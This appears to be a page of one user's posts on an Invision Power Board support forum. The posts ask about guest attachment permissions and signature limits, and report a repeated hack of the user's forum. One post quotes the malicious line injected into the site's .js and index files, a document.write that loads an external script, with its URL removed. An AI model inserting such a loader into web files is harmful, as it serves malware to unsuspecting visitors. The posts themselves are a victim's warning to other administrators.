I can't expect all users to remember to use an extra tag. It would be better if IPB contains the option to select which group can 'download' which type or just an option 'images only'.
I like to host all images on my server, because I know they won't disappear after a few years, a thing that does happen a lot when just using img-tags and use images from other websites.
  3. Retroforum added a post in a topic: Guest permissions: only see attached images

    Hi,

I'd like my forum to be a bit open to guests. They can read posts and they should be able to view all images in the img-tags and images that are attached.
However, I don't like guest to be able to download any other attachments like zip-files or mp3's.
How can I change the permissions for guests to only view ('download') attached images and not any other attached files?

    Anyone?
  5. Retroforum added a post in a topic: Hacked!

I don't use FTP, there is no FTP account.

I am my own server admin. The IPB-site was the only one to get hacked. Twice.

The server had been scanned for rootkits, which are not present.

I've changed a lot of permissions to my own likings, I had an idea it was about that, so I hope it's ok now.
I dont know any other forum software that is as likable as IPB ;)

I run my own server, I've checked and double checked every single domain, no problems there.
Maybe this was the cause:  http://community.invisionpower.com/topic/399747-ipboard-33x-34x-security-update/

    I dont know.
I must have missed a few files as well, because it happend again. Found 2 infected files that I must have missed.
Be warned: they also change your conf_global.php, I didn't see it, but it was there, at the bottom of the file :(

I got a popup telling me YOU HAVE TO INSTALL FLASH! and the forum was behind that, darkened, so a layer of black with little opacity was over it.

Also when loading the site I saw in the statusbar that it was loading a .pl-site as well, took a few seconds to load each page.

Can I disable smiles and more like that in signatures? It's so annoying.
I only want to allow 2 rows of plain text, that's it.

Be warned, not only the index-files, almost every .js-file as well!
  12. Retroforum added a post in a topic: Hacked!

My IPB has been hacked. About every .js-file and all index files have stuff added to them like this:
/*303431*/ document.write('<script type="text/javascript" src="REMOEVD"></script>');   /*/303431*/ Although I do not have the latest version, I did have all security patches applied.
    Be warned!

There is more stuff added to the index files, but the editor deletes them (probably recognised them as a virus)

    I see +Clients now, thanks.
Now quotes are broken, probably due to the 3.3 skin.

Yes, because it was made before the hack. Also after putting back the backup I changed all database login/password stuff and upgraded to the latest version and ran all safety checks.

Ofcourse not. I've been a registered client since 2010, but I don't always renew my license directly.
Everything is upgraded now and my license has been renewed.
